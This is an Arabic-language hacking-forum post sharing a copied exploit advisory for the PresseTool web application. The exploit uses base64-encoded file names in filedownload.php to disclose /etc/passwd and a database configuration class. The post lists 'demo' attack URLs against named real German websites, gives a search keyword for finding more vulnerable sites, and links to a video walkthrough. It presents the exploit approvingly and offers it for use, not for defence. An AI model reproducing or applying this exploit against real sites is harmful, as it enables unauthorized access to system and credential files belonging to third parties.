بمناسبة رجوع المنتدى : شرح ثغرة روعة نزلت في موقع السكورتي

**e . V . E . L** · 05-02-2011, 06:26 PM

السلام عليكم ..

كيفكم يالجيوش ؟؟

ان شاء لله تمام

بمناسبة رجوع المنتدى بعد انقطاعه ليوم او نص يوم تقريبا الحمدالله ..

الثغرة ..

PresseTool <= (/etc/passwd) Disclosure Exploit(Encoded) 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [~] Live Contact : [email protected] [~] E-Mail : [email protected] [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://exploit-id.com - http://0nto.me/ [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : PresseTool |~Price : N/A |~Version : N/A |~Software: N/A |~Vulnerability Style : /etc/passwd Disclosure |~Vulnerability Dir : / |~Google Keyword : Website by Plinka Design. |[~]Date : "23004.2011" |[~]Tested on : DEMOS ---------------------------------------------------------- filedownload.php <= 'file' Functions Not Security Disclosure file name Encode on base64 algorithm.. classes_class.database.php ENCODED BASE64 Y2xhc3Nlcy9jbGFzcy5EYXRhYmFzZS5waHA= Disclosure Attack ready --------------------------------------------------------- Demos /ETC/PASSWD Disclosure Attack.. http://www.regiocast.de/regiocast/pr...RjL3Bhc3N3ZA== http://www.mir-media.de/pressetool/f...RjL3Bhc3N3ZA== http://www.mach3.de/pressetool/filed...RjL3Bhc3N3ZA== OR classes_class.Database.php <= Disclosure Attack.. http://www.regiocast.de/regiocast/pr...RhYmFzZS5waHA= http://www.mir-media.de/pressetool/f...RhYmFzZS5waHA= http://www.mach3.de/pressetool/filed...RhYmFzZS5waHA=

الشرح ..

http://www.multiupload.com/4HOFSZDZCE

موفقين